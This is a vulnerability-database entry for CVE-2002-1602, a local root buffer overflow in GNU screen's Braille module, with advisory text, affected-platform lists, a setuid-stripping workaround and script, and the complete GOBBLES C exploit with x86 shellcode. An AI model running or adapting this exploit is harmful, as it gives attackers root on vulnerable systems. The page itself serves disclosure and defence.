CVE-2002-1602
CVSS 4.6
Published: 2002-04-23 00:00:00
Last revised: 2008-09-05 16:31:02

[Original] Buffer overflow in the Braille module for GNU screen 3.9.11, when HAVE_BRAILLE is defined, allows local users to execute arbitrary code.


[CNNVD] GNU Screen Braille module local buffer overflow vulnerability (CNNVD-200204-045)

        
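Screen is a free, open source terminal management program distributed and maintained by the Free Software Foundation. It runs on a variety of Unix and Linux operating systems.
The braille module in Screen does not perform sufficient or correct bounds checking, which can lead to a buffer overflow.
A local attacker can submit overly long string data to the screen program. Because the braille module handles bounds checking improperly, this can cause a buffer overflow, and because screen is installed setuid root, successful exploitation lets the attacker execute arbitrary commands with root privileges.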
        

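- CVSS (base score)

CVSS score: 4.6 [MEDIUM]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may cause degraded performance or interrupted access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]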

- CPE (affected platforms and products)

cpe:/a:gnu:screen:3.9.11  GNU screen 3.9.11
cpe:/a:gnu:screen:3.9.9  GNU screen 3.9.9
cpe:/a:gnu:screen:3.9.8  GNU screen 3.9.8
cpe:/a:gnu:screen:3.9.10  GNU screen 3.9.10
cpe:/a:gnu:screen:3.9.4  GNU screen 3.9.4

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1602
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1602
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200204-045
(Official data source) CNNVD

- Other links and resources

http://www.kb.cert.org/vuls/id/524227
(UNKNOWN)  CERT-VN  VU#524227
http://xforce.iss.net/xforce/xfdb/8929
(UNKNOWN)  XF  screen-braille-module-bo(8929)
http://www.securityfocus.com/bid/4578
(UNKNOWN)  BID  4578
http://www.securityfocus.com/archive/1/268998
(UNKNOWN)  BUGTRAQ  20020420 ALERT! ALERT! ALERT! ALERT! ALERT! hehehehe ;Pppppp

- Vulnerability information

GNU Screen Braille module local buffer overflow vulnerability
Medium severity  Boundary condition error
2002-04-23 00:00:00 2005-10-20 00:00:00
Local
        
        

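- Advisories and patches

Temporary workaround:
If you cannot install a patch or upgrade immediately, CNNVD recommends the following measure to reduce the threat:
* Use chmod a-s to remove the S bit from screen.
Vendor patch:
GNU
---
The vendor has not yet provided a patch or upgrade. Users of this software are advised to watch the vendor's home page for the latest version:

http://www.gnu.org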
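
The chmod a-s workaround above, as an added shell example (not part of the original advisory): it checks named binaries for the setuid/setgid bits, optionally strips them, and re-checks afterwards. The function names and the report/fix modes are assumptions made for this example.

```shell
#!/bin/sh
# Added example: audit binaries for the setuid/setgid bits and strip them,
# following the "chmod a-s" workaround. All names here are hypothetical.
# Usage: audit_screen report $(find_screen_binaries)
#        audit_screen fix /usr/bin/screen

# has_s_bit PATH: succeeds if PATH is a regular file with setuid or setgid set.
has_s_bit() {
    [ -f "$1" ] && { [ -u "$1" ] || [ -g "$1" ]; }
}

# strip_s_bit PATH: removes both bits, then re-checks, so a chmod that did
# not take effect (not the owner, read-only filesystem) is reported.
strip_s_bit() {
    chmod a-s "$1" 2>/dev/null || return 1
    if has_s_bit "$1"; then
        return 1
    fi
    return 0
}

# find_screen_binaries: prints every executable file named "screen" on $PATH.
find_screen_binaries() {
    old_ifs=$IFS
    IFS=:
    for dir in $PATH; do
        if [ -n "$dir" ] && [ -f "$dir/screen" ] && [ -x "$dir/screen" ]; then
            printf '%s\n' "$dir/screen"
        fi
    done
    IFS=$old_ifs
}

# audit_screen MODE FILE...: MODE is "report" (read-only) or "fix".
# Returns 1 if any file still carries an s bit when the run ends.
audit_screen() {
    mode=$1
    shift
    rc=0
    for bin in "$@"; do
        if has_s_bit "$bin"; then
            if [ "$mode" = fix ] && strip_s_bit "$bin"; then
                echo "FIXED   $bin"
            else
                echo "SETUID  $bin"
                rc=1
            fi
        else
            echo "OK      $bin"
        fi
    done
    return $rc
}
```
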

- Vulnerability information (21414)

GNU Screen 3.9.x Braille Module Buffer Overflow Vulnerability (EDBID:21414)
unix local
2002-04-23 Verified
0 Gobbles Security
N/A
source: http://www.securityfocus.com/bid/4578/info

Screen is a freely available, open source terminal management software package. It is distributed and maintained by the Free Software Foundation. It is available for the Unix and Linux platforms.

Under some circumstances, it may be possible for a local user to take advantage of a buffer overflow in screen. Due to insufficient bounds checking performed by the braille module of screen, it is possible for a local user to pass long strings of data to the screen program, which could result in an overflow, and the overwriting of process memory. This could result in the execution of arbitrary code.

/*
  screen 3.9.11 local root exploit for braille module 
  dedicated to the $ecurity Community, where blind leading blind.
  code for: linux/x86

  to use:
  1) edit paths in #defines
  2) gcc -o GOBBLES-own-screen GOBBLES-own-screen.c
  3) ./GOBBLES-own-screen -p
  4) ./GOBBLES-own-screen -f
  5) ./GOBBLES-own-screen -a 0xGOBBLES

  if you want rootshell, that up to you to modify exploit.

  beware vicious remote root exploit coming from GOBBLES for Sun Solaris
  version 6-8, hurry up Sun to make patch. . .
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define NULLBASE 	48
#define TABLE		"/home/GOBBLES/hacking/.scrx"
#define SCREENRC	"/home/GOBBLES/hacking/.screenrc"
#define SCREEN		"/home/GOBBLES/hacking/current/screen-3.9.11/screen"
#define FIND		1
#define PUT		0
#define OFFSET		-40300 
#define SHELL		"/bin/bash" 
#define NOP		0x90

void bta(int byte, char *store);
void stuff(int que);

unsigned long get_sp(void)
{       __asm__ ("movl %esp, %eax");
	// rumor is Cousin WOBBLES leaked this public, hehehe thnx!
}

int
main(int argc, char **argv)
{
	char *a, *tmp, buf[64], store[10], c;
	unsigned long address;
	unsigned int w[4];
	int i, b, start;	
	FILE *fd;

	if(argc == 1) {
		fprintf(stderr, "\n%s [ -p ] [ -f ] [ -a <shellcode address> -o <offset to GOT address> ]\n\n", argv[0]);
		fprintf(stderr, "-p switch places shellcode into memory\n");
		fprintf(stderr, "-f switch finds shellcode address\n\n");
		fprintf(stderr, "No switch runs exploit with options:\n");
		fprintf(stderr, "\t-a <shellcode address>\n");
		fprintf(stderr, "\t-o <offset to GOT address>\n\n");
		exit(0);
	}
	
	start = OFFSET;
	
	while((c = getopt(argc, argv, "pfa:o:")) != EOF) {
		switch(c) {
			case 'p':
				stuff(PUT);
				exit(0);
			case 'f':
				stuff(FIND);
				exit(0);
			case 'a':
				sscanf(optarg, "%p", &tmp);
				address = (long)tmp;
				break;
			case 'o':
				start = atoi(optarg);
				break;
			default:
				fprintf(stderr, "hehehehe?\n");
				exit(0);
		}
	}
				
			
	fprintf(stderr, ". preparing evil braille table\n");

	if((fd = fopen(TABLE, "w")) == NULL) {
                perror("fopen");
                exit(1);
        }

	fprintf(stderr, ". converting: 0x%lx into braille table strings\n", address); 
 
	w[0] = (address & 0x000000ff);
        w[1] = (address & 0x0000ff00) >> 8;
        w[2] = (address & 0x00ff0000) >> 16;
        w[3] = (address & 0xff000000) >> 24;
	
	for(i = 0; i < 4; i++) { 
		memset(store, 'o', 9);
		bta(w[i], store);
		memset(buf, '\0', sizeof(buf));
		snprintf(buf, sizeof(buf), "%d ff %s\n", start+i, store);
		fprintf(stderr, ". writing to braille table: %s", buf);
		fprintf(fd, "%s", buf);
	}
	
	fclose(fd);
	
	fprintf(stderr, ". preparing evil .screenrc\n");
		
	if((fd = fopen(SCREENRC, "w")) == NULL) {
                perror("fopen");
                exit(1);
        }
	
	fprintf(fd, "bd_start_braille on\n");
	memset(buf, '\0', sizeof(buf));
	snprintf(buf, sizeof(buf), "bd_braille_table %s\n", TABLE);
	fprintf(fd, "%s", buf);
	fprintf(fd, "bd_type powerbraille_40\n");
	fprintf(fd, "bd_port /dev/ttyS0\n");
	fclose(fd);
	
	fprintf(stderr, ". now exploiting blind, hehehe\n");
	
	if(execl(SCREEN, "screen", "-c", SCREENRC, NULL)) {
		fprintf(stderr, ". error executing\n");
		exit(1);
	} 
}

void
bta(int byte, char *store)
{
	int check[9], i, b, tmp;
	
	check[0] = 0;
	check[1] = 1;
	check[2] = 2;
	check[3] = 4;
	check[4] = 8;
	check[5] = 16;
	check[6] = 32;
	check[7] = 64;
	check[8] = 128;

	tmp = byte;
	for(i = 8; i >= 0; i--) {
		if(check[i] <= tmp) { 
			tmp -= check[i];
			store[i] = 'x';
		}
	}
	
	for(i = 0; i < 9; i++) {
		if(store[i] == 'x') 
			store[i] = NULLBASE + i;
		else
			store[i] = NULLBASE;
	}
	store[9] = '\0';
	fprintf(stderr, ". braille table string for byte: 0x%x is: %s\n", byte, store);
}

void
stuff(int que)   
{
	char *p, codebuf[4097], code[] =
        // borrowed shellcode, GOBBLES lazy today,
	// not sure who to credit for it, if it 
        // yours please email GOBBLES@hushmail.com
        // to be acknowledged!
	"\x31\xc0\x83\xc0\x17\x31\xdb\xcd\x80\xeb"
        "\x30\x5f\x31\xc9\x88\x4f\x17\x88\x4f\x1a"
        "\x8d\x5f\x10\x89\x1f\x8d\x47\x18\x89\x47"
        "\x04\x8d\x47\x1b\x89\x47\x08\x31\xc0\x89"
        "\x47\x0c\x8d\x0f\x8d\x57\x0c\x83\xc0\x0b"
        "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8"
        "\xcb\xff\xff\xff\x41\x41\x41\x41\x41\x41"
        "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
        "\x2f\x62\x69\x6e\x2f\x73\x68\x30\x2d\x63"
        "\x30"
	
	// hehehe..hoping blind not deaf so he can hear beep, hehehe.
	"echo \"Hope you not really blind, because you now owned by unethical penetrator using ethical GOBBLES exploit, hehehehe ;Pppppp\" | wall";
	// also let user on shell provider know system compromised, hehe.
	char *locate = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
	int i;

	if(que == PUT) {
		// adding many nops to build much suspense hehehe
		memset(&codebuf, '\0', sizeof(codebuf));
        	memset(codebuf, NOP, (sizeof(codebuf) - 1));
        	memcpy(codebuf + (sizeof(codebuf) - strlen(code) - 1), code, strlen(code));
		fprintf(stderr, ". run GOBBLES-own-screen -f\n");
		if(setenv("CODE", codebuf, 1) == -1) {
                	fprintf(stderr, ". no mem for shellcode\n");
                	return;
        	}
		
		system(SHELL);
	}
 	else if(que == FIND) {
		// track down nops
        	fprintf(stderr, ". getting address\n");
		p = (char *)get_sp();
		while((i = strncmp(p, locate, strlen(locate))) != 0) 
			p++;        

		if(i == 0) {
			fprintf(stderr, ". shellcode found at: 0x%lx\n", p+1);
             		return;
		}
		else {
			fprintf(stderr, ". trouble locating shellcode\n");
			return;
		}
	}
}

		

- Vulnerability information

19038
Braille module for GNU HAVE_BRAILLE Local Overflow
Input Manipulation
Loss of Integrity

- Vulnerability description

- Timeline

2002-04-20 Unknown
2002-04-20 Unknown

- Solution

Products

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

GNU Screen Braille Module Buffer Overflow Vulnerability
Boundary Condition Error 4578
No Yes
2002-04-23 12:00:00 2009-07-11 12:46:00
Vulnerability discovery credited to Gobbles Security.

- Affected software versions

GNU screen 3.9.11
- Caldera OpenLinux Server 3.1.1
- Caldera OpenLinux Workstation 3.1.1
- Conectiva Linux 7.0
- Conectiva Linux 6.0
- Conectiva Linux 5.1
- Conectiva Linux 5.0
- Conectiva Linux graficas
- Conectiva Linux ecommerce
- Debian Linux 2.2 sparc
- Debian Linux 2.2 powerpc
- Debian Linux 2.2 IA-32
- Debian Linux 2.2 arm
- Debian Linux 2.2 alpha
- Debian Linux 2.2 68k
- FreeBSD FreeBSD 4.5 -STABLE
- FreeBSD FreeBSD 4.5 -RELEASE
- FreeBSD FreeBSD 4.5
- FreeBSD FreeBSD 4.4 -STABLE
- FreeBSD FreeBSD 4.4 -RELENG
- FreeBSD FreeBSD 4.4
- FreeBSD FreeBSD 4.3 -STABLE
- FreeBSD FreeBSD 4.3 -RELENG
- FreeBSD FreeBSD 4.3 -RELEASE
- FreeBSD FreeBSD 4.3
- HP HP-UX 11.20
- HP HP-UX 11.11
- HP HP-UX 11.0
- HP HP-UX 10.20
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
+ MandrakeSoft Multi Network Firewall 2.0
+ Mandriva Linux Mandrake 9.0
- Mandriva Linux Mandrake 8.2
- Mandriva Linux Mandrake 8.1 ia64
- Mandriva Linux Mandrake 8.1
- Mandriva Linux Mandrake 8.0 ppc
- Mandriva Linux Mandrake 8.0
- Mandriva Linux Mandrake 7.2
- NetBSD NetBSD 1.5.2
- NetBSD NetBSD 1.5.1
- NetBSD NetBSD 1.5
- OpenBSD OpenBSD 2.9
- OpenBSD OpenBSD 2.8
- OpenBSD OpenBSD 2.7
- OpenBSD OpenBSD 2.6
- OpenBSD OpenBSD 3.0
- RedHat Linux 7.2 ia64
- RedHat Linux 7.2 i386
- RedHat Linux 7.2 alpha
- RedHat Linux 7.1 ia64
- RedHat Linux 7.1 i386
- RedHat Linux 7.0 sparc
- RedHat Linux 7.0 i386
- RedHat Linux 7.0 alpha
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 alpha
- S.u.S.E. Linux 7.1 sparc
- S.u.S.E. Linux 7.1 ppc
- S.u.S.E. Linux 7.1 alpha
- S.u.S.E. Linux 7.1
- S.u.S.E. Linux 7.0 sparc
- S.u.S.E. Linux 7.0 ppc
- S.u.S.E. Linux 7.0 i386
- S.u.S.E. Linux 7.0 alpha
- S.u.S.E. Linux 6.4 ppc
- S.u.S.E. Linux 6.4 i386
- S.u.S.E. Linux 6.4 alpha
- Slackware Linux 8.0
- Slackware Linux 7.1
- Sun Solaris 8_x86
- Sun Solaris 8_sparc
- Sun Solaris 7.0_x86
- Sun Solaris 7.0
- Sun Solaris 2.6_x86
- Sun Solaris 2.6
GNU screen 3.9.10
- Caldera OpenLinux Server 3.1.1
- Caldera OpenLinux Workstation 3.1.1
+ Conectiva Linux 8.0
- Conectiva Linux 7.0
- Conectiva Linux 6.0
- Conectiva Linux 5.1
- Conectiva Linux 5.0
- Conectiva Linux graficas
- Conectiva Linux ecommerce
- Debian Linux 2.2 sparc
- Debian Linux 2.2 powerpc
- Debian Linux 2.2 IA-32
- Debian Linux 2.2 arm
- Debian Linux 2.2 alpha
- Debian Linux 2.2 68k
- FreeBSD FreeBSD 4.5 -STABLE
- FreeBSD FreeBSD 4.5 -RELEASE
- FreeBSD FreeBSD 4.5
- FreeBSD FreeBSD 4.4 -STABLE
- FreeBSD FreeBSD 4.4 -RELENG
- FreeBSD FreeBSD 4.4
- FreeBSD FreeBSD 4.3 -STABLE
- FreeBSD FreeBSD 4.3 -RELENG
- FreeBSD FreeBSD 4.3 -RELEASE
- FreeBSD FreeBSD 4.3
- HP HP-UX 11.20
- HP HP-UX 11.11
- HP HP-UX 11.0
- HP HP-UX 10.20
- Mandriva Linux Mandrake 8.2
- Mandriva Linux Mandrake 8.1 ia64
- Mandriva Linux Mandrake 8.1
- Mandriva Linux Mandrake 8.0 ppc
- Mandriva Linux Mandrake 8.0
- Mandriva Linux Mandrake 7.2
- NetBSD NetBSD 1.5.2
- NetBSD NetBSD 1.5.1
- NetBSD NetBSD 1.5
- OpenBSD OpenBSD 2.9
- OpenBSD OpenBSD 2.8
- OpenBSD OpenBSD 2.7
- OpenBSD OpenBSD 2.6
- OpenBSD OpenBSD 3.0
- RedHat Linux 7.2 ia64
- RedHat Linux 7.2 i386
- RedHat Linux 7.2 alpha
- RedHat Linux 7.1 ia64
- RedHat Linux 7.1 i386
- RedHat Linux 7.0 sparc
- RedHat Linux 7.0 i386
- RedHat Linux 7.0 alpha
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 alpha
- S.u.S.E. Linux 7.1 sparc
- S.u.S.E. Linux 7.1 ppc
- S.u.S.E. Linux 7.1 alpha
- S.u.S.E. Linux 7.1
- S.u.S.E. Linux 7.0 sparc
- S.u.S.E. Linux 7.0 ppc
- S.u.S.E. Linux 7.0 i386
- S.u.S.E. Linux 7.0 alpha
- S.u.S.E. Linux 6.4 ppc
- S.u.S.E. Linux 6.4 i386
- S.u.S.E. Linux 6.4 alpha
+ SCO OpenLinux Server 3.1.1
+ SCO OpenLinux Workstation 3.1.1
- Slackware Linux 8.0
- Slackware Linux 7.1
- Sun Solaris 8_x86
- Sun Solaris 8_sparc
- Sun Solaris 7.0_x86
- Sun Solaris 7.0
- Sun Solaris 2.6_x86
- Sun Solaris 2.6
GNU screen 3.9.9
- Caldera OpenLinux Server 3.1.1
- Caldera OpenLinux Workstation 3.1.1
- Conectiva Linux 7.0
- Conectiva Linux 6.0
- Conectiva Linux 5.1
- Conectiva Linux 5.0
- Conectiva Linux graficas
- Conectiva Linux ecommerce
- Debian Linux 2.2 sparc
- Debian Linux 2.2 powerpc
- Debian Linux 2.2 IA-32
- Debian Linux 2.2 arm
- Debian Linux 2.2 alpha
- Debian Linux 2.2 68k
- FreeBSD FreeBSD 4.5 -STABLE
- FreeBSD FreeBSD 4.5 -RELEASE
- FreeBSD FreeBSD 4.5
- FreeBSD FreeBSD 4.4 -STABLE
- FreeBSD FreeBSD 4.4 -RELENG
- FreeBSD FreeBSD 4.4
- FreeBSD FreeBSD 4.3 -STABLE
- FreeBSD FreeBSD 4.3 -RELENG
- FreeBSD FreeBSD 4.3 -RELEASE
- FreeBSD FreeBSD 4.3
- HP HP-UX 11.20
- HP HP-UX 11.11
- HP HP-UX 11.0
- HP HP-UX 10.20
- Mandriva Linux Mandrake 8.2
- Mandriva Linux Mandrake 8.1 ia64
- Mandriva Linux Mandrake 8.1
- Mandriva Linux Mandrake 8.0 ppc
- Mandriva Linux Mandrake 8.0
- Mandriva Linux Mandrake 7.2
- NetBSD NetBSD 1.5.2
- NetBSD NetBSD 1.5.1
- NetBSD NetBSD 1.5
- OpenBSD OpenBSD 2.9
- OpenBSD OpenBSD 2.8
- OpenBSD OpenBSD 2.7
- OpenBSD OpenBSD 2.6
- OpenBSD OpenBSD 3.0
- RedHat Linux 7.2 ia64
- RedHat Linux 7.2 i386
- RedHat Linux 7.2 alpha
- RedHat Linux 7.1 ia64
- RedHat Linux 7.1 i386
- RedHat Linux 7.0 sparc
- RedHat Linux 7.0 i386
- RedHat Linux 7.0 alpha
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 alpha
- S.u.S.E. Linux 7.1 sparc
- S.u.S.E. Linux 7.1 ppc
- S.u.S.E. Linux 7.1 alpha
- S.u.S.E. Linux 7.1
- S.u.S.E. Linux 7.0 sparc
- S.u.S.E. Linux 7.0 ppc
- S.u.S.E. Linux 7.0 i386
- S.u.S.E. Linux 7.0 alpha
- S.u.S.E. Linux 6.4 ppc
- S.u.S.E. Linux 6.4 i386
- S.u.S.E. Linux 6.4 alpha
- Slackware Linux 8.0
- Slackware Linux 7.1
- Sun Solaris 8_x86
- Sun Solaris 8_sparc
- Sun Solaris 7.0_x86
- Sun Solaris 7.0
- Sun Solaris 2.6_x86
- Sun Solaris 2.6
GNU screen 3.9.8
- Caldera OpenLinux Server 3.1.1
- Caldera OpenLinux Workstation 3.1.1
- Conectiva Linux 7.0
- Conectiva Linux 6.0
- Conectiva Linux 5.1
- Conectiva Linux 5.0
- Conectiva Linux graficas
- Conectiva Linux ecommerce
- Debian Linux 2.2 sparc
- Debian Linux 2.2 powerpc
- Debian Linux 2.2 IA-32
- Debian Linux 2.2 arm
- Debian Linux 2.2 alpha
- Debian Linux 2.2 68k
- FreeBSD FreeBSD 4.5 -STABLE
- FreeBSD FreeBSD 4.5 -RELEASE
- FreeBSD FreeBSD 4.5
- FreeBSD FreeBSD 4.4 -STABLE
- FreeBSD FreeBSD 4.4 -RELENG
- FreeBSD FreeBSD 4.4
- FreeBSD FreeBSD 4.3 -STABLE
- FreeBSD FreeBSD 4.3 -RELENG
- FreeBSD FreeBSD 4.3 -RELEASE
- FreeBSD FreeBSD 4.3
- HP HP-UX 11.20
- HP HP-UX 11.11
- HP HP-UX 11.0
- HP HP-UX 10.20
- Mandriva Linux Mandrake 8.2
- Mandriva Linux Mandrake 8.1 ia64
- Mandriva Linux Mandrake 8.1
- Mandriva Linux Mandrake 8.0 ppc
- Mandriva Linux Mandrake 8.0
- Mandriva Linux Mandrake 7.2
- NetBSD NetBSD 1.5.2
- NetBSD NetBSD 1.5.1
- NetBSD NetBSD 1.5
- OpenBSD OpenBSD 2.9
- OpenBSD OpenBSD 2.8
- OpenBSD OpenBSD 2.7
- OpenBSD OpenBSD 2.6
- OpenBSD OpenBSD 3.0
- RedHat Linux 7.2 ia64
- RedHat Linux 7.2 i386
- RedHat Linux 7.2 alpha
- RedHat Linux 7.1 ia64
- RedHat Linux 7.1 i386
- RedHat Linux 7.0 sparc
- RedHat Linux 7.0 i386
- RedHat Linux 7.0 alpha
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 alpha
- S.u.S.E. Linux 7.1 sparc
- S.u.S.E. Linux 7.1 ppc
- S.u.S.E. Linux 7.1 alpha
- S.u.S.E. Linux 7.1
- S.u.S.E. Linux 7.0 sparc
- S.u.S.E. Linux 7.0 ppc
- S.u.S.E. Linux 7.0 i386
- S.u.S.E. Linux 7.0 alpha
- S.u.S.E. Linux 6.4 ppc
- S.u.S.E. Linux 6.4 i386
- S.u.S.E. Linux 6.4 alpha
- Slackware Linux 8.0
- Slackware Linux 7.1
- Sun Solaris 8_x86
- Sun Solaris 8_sparc
- Sun Solaris 7.0_x86
- Sun Solaris 7.0
- Sun Solaris 2.6_x86
- Sun Solaris 2.6
GNU screen 3.9.4
- Caldera OpenLinux Server 3.1.1
- Caldera OpenLinux Workstation 3.1.1
- Conectiva Linux 7.0
- Conectiva Linux 6.0
- Conectiva Linux 5.1
- Conectiva Linux 5.0
- Conectiva Linux graficas
- Conectiva Linux ecommerce
- Debian Linux 2.2 sparc
- Debian Linux 2.2 powerpc
- Debian Linux 2.2 IA-32
- Debian Linux 2.2 arm
- Debian Linux 2.2 alpha
- Debian Linux 2.2 68k
- FreeBSD FreeBSD 4.5 -STABLE
- FreeBSD FreeBSD 4.5 -RELEASE
- FreeBSD FreeBSD 4.5
- FreeBSD FreeBSD 4.4 -STABLE
- FreeBSD FreeBSD 4.4 -RELENG
- FreeBSD FreeBSD 4.4
- FreeBSD FreeBSD 4.3 -STABLE
- FreeBSD FreeBSD 4.3 -RELENG
- FreeBSD FreeBSD 4.3 -RELEASE
- FreeBSD FreeBSD 4.3
- HP HP-UX 11.20
- HP HP-UX 11.11
- HP HP-UX 11.0
- HP HP-UX 10.20
- Mandriva Linux Mandrake 8.2
- Mandriva Linux Mandrake 8.1 ia64
- Mandriva Linux Mandrake 8.1
- Mandriva Linux Mandrake 8.0 ppc
- Mandriva Linux Mandrake 8.0
- Mandriva Linux Mandrake 7.2
- NetBSD NetBSD 1.5.2
- NetBSD NetBSD 1.5.1
- NetBSD NetBSD 1.5
- OpenBSD OpenBSD 2.9
- OpenBSD OpenBSD 2.8
- OpenBSD OpenBSD 2.7
- OpenBSD OpenBSD 2.6
- OpenBSD OpenBSD 3.0
- RedHat Linux 7.2 ia64
- RedHat Linux 7.2 i386
- RedHat Linux 7.2 alpha
- RedHat Linux 7.1 ia64
- RedHat Linux 7.1 i386
- RedHat Linux 7.0 sparc
- RedHat Linux 7.0 i386
- RedHat Linux 7.0 alpha
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 alpha
- S.u.S.E. Linux 7.1 sparc
- S.u.S.E. Linux 7.1 ppc
- S.u.S.E. Linux 7.1 alpha
- S.u.S.E. Linux 7.1
- S.u.S.E. Linux 7.0 sparc
- S.u.S.E. Linux 7.0 ppc
- S.u.S.E. Linux 7.0 i386
- S.u.S.E. Linux 7.0 alpha
- S.u.S.E. Linux 6.4 ppc
- S.u.S.E. Linux 6.4 i386
- S.u.S.E. Linux 6.4 alpha
- Slackware Linux 8.0
- Slackware Linux 7.1
- Sun Solaris 8_x86
- Sun Solaris 8_sparc
- Sun Solaris 7.0_x86
- Sun Solaris 7.0
- Sun Solaris 2.6_x86
- Sun Solaris 2.6


- Exploit

This exploit contributed by GOBBLES Security.

- Solution

Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.
